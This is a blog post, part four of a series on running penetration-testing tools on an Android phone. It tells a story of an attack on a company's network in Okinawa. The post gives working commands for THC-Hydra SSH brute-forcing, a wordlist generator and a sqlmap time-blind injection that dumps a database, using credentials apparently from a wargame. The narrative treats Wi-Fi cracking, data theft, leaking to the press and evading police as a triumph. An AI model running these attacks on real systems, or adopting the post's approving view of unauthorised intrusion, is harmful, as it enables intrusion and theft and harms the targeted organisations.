Friday, 8 May 2015

Pentesting on the Fly : Android Phone - Part 4) My Phone Is a War Machine (Sqlmap, Hydra, Reaver...)

Now, we'll reveal the full potential of our smartphone. Please note that yhere's enough free space to have all the Tools we used since part 1 installed.
--Keep in Mind that at each chapter you'll need to launch Linux Deploy, tap "Start", and then SSH android@localhost and type in changeme --

If you followed my previous post, you know that :

Okay. I'm in Naha right now. Our target is clear : This Enterprise's servers.
performed a vuln scan, and it seems they're very well protected. So I decide to attack a weak point : It's internal network.
My phone allows me a great mobility. That's why I have to get close to their offices which are located in Okinawa's greated tower :

But obviously I can't just get into their offices and wait for my attack to crack the network's password. So I get on nearby rooftop and I fire up my phone, with some special material...

Using Reaver I sucessfully cracked their network. Now I can scan their LAN using nmap.

Nice ! I found a Telnet and a SSH port open. Let's try to hack it !

We'll simply try to bruteforce the admin's ssh account using THC-Hydra. If that doesn't work, then we'll try to find another vulnerability... Maybe one like Sony's hack ? (sqli)
apt-get install hydra
Sqlmap :
tar zxvf sqlmap-0.9.tar.gz
cd sqlmap
To bruteforce a SSH account for example, use the following command :
hydra -l admin -t 12 -f -x 8:10:a1% -s 22 -v -V ssh
-l : Specify login
-t 12: Number of thread : You'll have to optimize it according to your server
-f : exit after first password found
-x : bruteforce min-max number of char, followed by the charset you want : a1% -> lowcase letters, numbers, and '%'
-s : port
ssh : the service to attack
To use a dictionary list :
hydra -l admin -t 12 -f -P password.list -s 22 -v -V ssh
To generate for example random strings to crack the admin password (8 char) :
cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 8 | head -n 100000 > password.lst
Screenshots ?

Hydra's attack :

I won't stay a whole night on my roof trying to crack a random password...
That's why I decide to launch my MITM attack with my imporved script (take a look at the end of this post I edited it and improved the script)
I get credentials from a little priviledged user account. But it'll be okay.
I explore the network and I found an authentification page to find the admin's account !
I bet there's a possible SQL injection, but I need to enter first the user's credentials... :

Once the user's credentials entered, here's what I'm prompted :

Well... Just hack it !
Fire up Sqlmap :
python -u "" --auth-type=BASIC --auth-cred="natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw" --data "username=natas18" --dbms=MySQL --technique=T --level=5 --risk=3 --dump
-u : specify target's URL
--auth-type and --auth-cred : Type of authentification and our user's crendentials. (Huh... Take a look at this string, I couldn't have cracked it with Hydra..)
--data : Our injection !
--dbms : The... dbms
-T : To force a time-blind injection
--level --risk : max level of injection
--dump : dump database.
Screenshots ?

And... DUMP ! (i volontary stopped the attack, not to show the creds)

Once I've got the admin's credentials, I now have full access to ther server's database from my phone !
I don't lose any time, I directly upload all their files on distants servers. Sent to Wikileaks, press agencies, media sharing websites.
Here's how you can hack almost anything from your pocket...

Buuuuutt ! Safety first ! I know they've detected my intrusion
And I already know they're searching me and calling authorities.
Gotta run and disappear...

Hey there! Finally, I think I have convinced you that your phone is a Hacking Vector just like your PC or a Raspberry PI.
From here, you've learn to use your favorite Tools on your phone and get through the "command line only" restriction.
I hope you've learned something cool following my post :)
What happened to John, our hero ? Well huh, maybe I play too much video games, but let's tell us he became Aiden Pearce ?

Anyway, when reality meets fictions...
Keep it up !

1 comment: